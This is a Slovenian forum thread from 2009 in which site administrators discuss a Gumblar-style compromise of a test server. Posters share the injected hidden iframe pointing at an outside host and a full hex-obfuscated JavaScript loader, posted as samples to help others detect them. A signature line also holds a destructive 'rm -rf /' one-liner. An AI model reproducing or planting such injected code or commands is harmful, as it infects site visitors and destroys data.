Nov vdor in škodljiva koda v <iframe>

Domov > Administracija strežnikov in spletnih strani > Nov vdor in škodljiva koda v <iframe>

stran 1 od 2 |<<12 >>|

Nov vdor in škodljiva koda v <iframe>

Antony24. jun 2009 07:26:54Pridružen od: 18. maj 2008 140 objav +108-24	#1Včeraj nam je na testnem strežniku nek nepridiprav vnesel v indexe sledečo kodo: < i f r a m e src= " http : // a3h.pl:8080/ts/in.cgi?pepsi77 " width=125 height=125 style="visibility: hidden"></ i f r a m e > Kodo prilagam za lažje iskanje, če komu prav pride. LP všeč(0)ni všeč(0)spam(0) spletne strani in spletne trgovine


jankoM24. jun 2009 09:00:24Pridružen od: 25. sep 2007 485 objav +72-30	#2hvala za copy/paste... a pa kej veš ta koda s presledki dela v vseh browserjih ali samo v kakem IE? nazadnje urejal jankoM 24. jun 2009 09:05:09 všeč(0)ni všeč(0)spam(0) InvoiceFox \| Čebelca.biz \| UsrJoy


Antony24. jun 2009 09:15:06Pridružen od: 18. maj 2008 140 objav +108-24	#3v kodo s presledki sem naredil sam, da nebi slučajno prilepil kakšne pizdarije. Drugače je koda brez presledkov všeč(0)ni všeč(0)spam(0) spletne strani in spletne trgovine


Antony24. jun 2009 09:17:01Pridružen od: 18. maj 2008 140 objav +108-24	#4in pa še eno zraven: < s c r i p t > function c102916999516l49464ef52d352(l49464ef52db24){ function l49464ef52e2f0(){return 16;} return (parseInt(l49464ef52db24,l49464ef52e2f0()));}function l49464ef52f290(l49464ef5301a7){ var l49464ef530a03='';l49464ef532945=String.fromCharCode;for(l49464ef5311d6=0;l49464ef5311d6<l49464ef5301a7.length;l49464ef5311d6+=2){ l49464ef530a03+=(l49464ef532945(c102916999516l49464ef52d352(l49464ef5301a7.substr(l49464ef5311d6,2))));}return l49464ef530a03;} var xef='';var l49464ef533ef8='3C736'+xef+'3726'+xef+'970743E6'+xef+'96'+xef+'6'+xef+'28216'+xef+'D796'+xef+'96'+xef+'1297B6'+xef+'46'+xef+'F6'+xef+'3756'+xef+'D6'+xef+'56'+xef+'E742E77726'+xef+'9746'+xef+'528756'+xef+'E6'+xef+'5736'+xef+'36'+xef+'1706'+xef+'528202725336'+xef+'32536'+xef+'392536'+xef+'36'+xef+'2537322536'+xef+'312536'+xef+'6'+xef+'42536'+xef+'352532302536'+xef+'6'+xef+'52536'+xef+'312536'+xef+'6'+xef+'42536'+xef+'3525336'+xef+'42536'+xef+'332533312533302532302537332537322536'+xef+'3325336'+xef+'42532372536'+xef+'3825373425373425373025336'+xef+'125326'+xef+'6'+xef+'25326'+xef+'6'+xef+'2536'+xef+'372536'+xef+'6'+xef+'6'+xef+'2536'+xef+'372536'+xef+'6'+xef+'6'+xef+'2533322536'+xef+'6'+xef+'42536'+xef+'3525326'+xef+'52536'+xef+'6'+xef+'52536'+xef+'3525373425326'+xef+'6'+xef+'25326'+xef+'52536'+xef+'372536'+xef+'6'+xef+'6'+xef+'25326'+xef+'6'+xef+'2536'+xef+'332536'+xef+'382536'+xef+'352536'+xef+'332536'+xef+'6'+xef+'225326'+xef+'52536'+xef+'382537342536'+xef+'6'+xef+'42536'+xef+'6'+xef+'32532372532302537372536'+xef+'392536'+xef+'342537342536'+xef+'3825336'+xef+'42533332533382533392532302536'+xef+'382536'+xef+'352536'+xef+'392536'+xef+'372536'+xef+'3825373425336'+xef+'42533342533302533312532302537332537342537392536'+xef+'6'+xef+'32536'+xef+'3525336'+xef+'4253237253736'+xef+'2536'+xef+'392537332536'+xef+'392536'+xef+'322536'+xef+'392536'+xef+'6'+xef+'32536'+xef+'3925373425373925336'+xef+'12536'+xef+'382536'+xef+'392536'+xef+'342536'+xef+'342536'+xef+'352536'+xef+'6'+xef+'525323725336'+xef+'525336'+xef+'325326'+xef+'6'+xef+'2536'+xef+'392536'+xef+'36'+xef+'2537322536'+xef+'312536'+xef+'6'+xef+'42536'+xef+'3525336'+xef+'52729293B7D76'+xef+'6'+xef+'172206'+xef+'D796'+xef+'96'+xef+'13D7472756'+xef+'53B3C2F736'+xef+'3726'+xef+'970743E';document.write(l49464ef52f290(l49464ef533ef8));</script všeč(0)ni všeč(0)spam(0) spletne strani in spletne trgovine


jankoM24. jun 2009 09:19:15Pridružen od: 25. sep 2007 485 objav +72-30	#5Aja .. ker nekje sem pa pravi videl da uporabljajo presledke newline in podobno da prikrijejo kaj se dogaja, obidejo parserje itd.. Ja ta drug stil je tudi pogosti.. Skupno tem "enkriptanim" je da uporavljajo fromCharCode in včasih eval zato jih site assistant išče in javlja. (samo ta del je šele v začetku razvoja) nazadnje urejal jankoM 24. jun 2009 09:20:53 všeč(0)ni všeč(0)spam(0) InvoiceFox \| Čebelca.biz \| UsrJoy


bl4ckb1rd24. jun 2009 09:27:32Pridružen od: 18. avg 2008 962 objav +464-765	#6kot prvo testni spletni strežnik sploh ne bi smel biti dostopen iz zunaj... če vseeno potrebujete oddaljen dostop do njega si zrihtajte vpn. všeč(0)ni všeč(0)spam(0) Ruska ruleta v command line-ju: [ $[ $RANDOM % 6 ] == 0 ] && rm -rf / \|\| echo Click


Frorchy24. jun 2009 09:33:37Pridružen od: 16. jan 2009 1099 objav +780-12649	#7Men prekine povezavo antivirusnik k grem na tole temo. :D všeč(0)ni všeč(0)spam(0) Gostovanje Hostgator \| Gostovanje in Free Domena FatCow - 47% OFF


Mika24. jun 2009 10:01:22Pridružen od: 22. apr 2007 3029 objav +994-26730	#8Antony, predpostavljam, da nekdo izmed vas uporablja Filezillo ali kak podoben FTP client, ki shranjuje passworde v txt datoteko. Debata že teče tule: http://www.internetmojster.com/administracija/gumblar-ftp-virus.html všeč(0)ni všeč(0)spam(0)


dbMG24. jun 2009 10:03:59Pridružen od: 1. avg 2007 338 objav +28-90	#9Da, po vsej verjetnosti gre za Gumblar zadevo :) všeč(0)ni všeč(0)spam(0) Cloud VPS gostovanje \| Direktorij povezav \| Brezplačno gostovanje datotek


Antony24. jun 2009 10:26:30Pridružen od: 18. maj 2008 140 objav +108-24	#10ja, tudi sam sem skoraj prepričan da gre za gumblar. Tudi Filezilla se uporablja... Sicer kodo spremenil s presldki, vendar ne dovolj, ker nekaterih antivirsnik še vedno prepozna dkodo, kar je pohvalno. moj NOD32 je tiho ko miš... všeč(0)ni všeč(0)spam(0) spletne strani in spletne trgovine


Domov > Administracija strežnikov in spletnih strani > Nov vdor in škodljiva koda v <iframe> stran 1 od 2 \|<<12 >>\|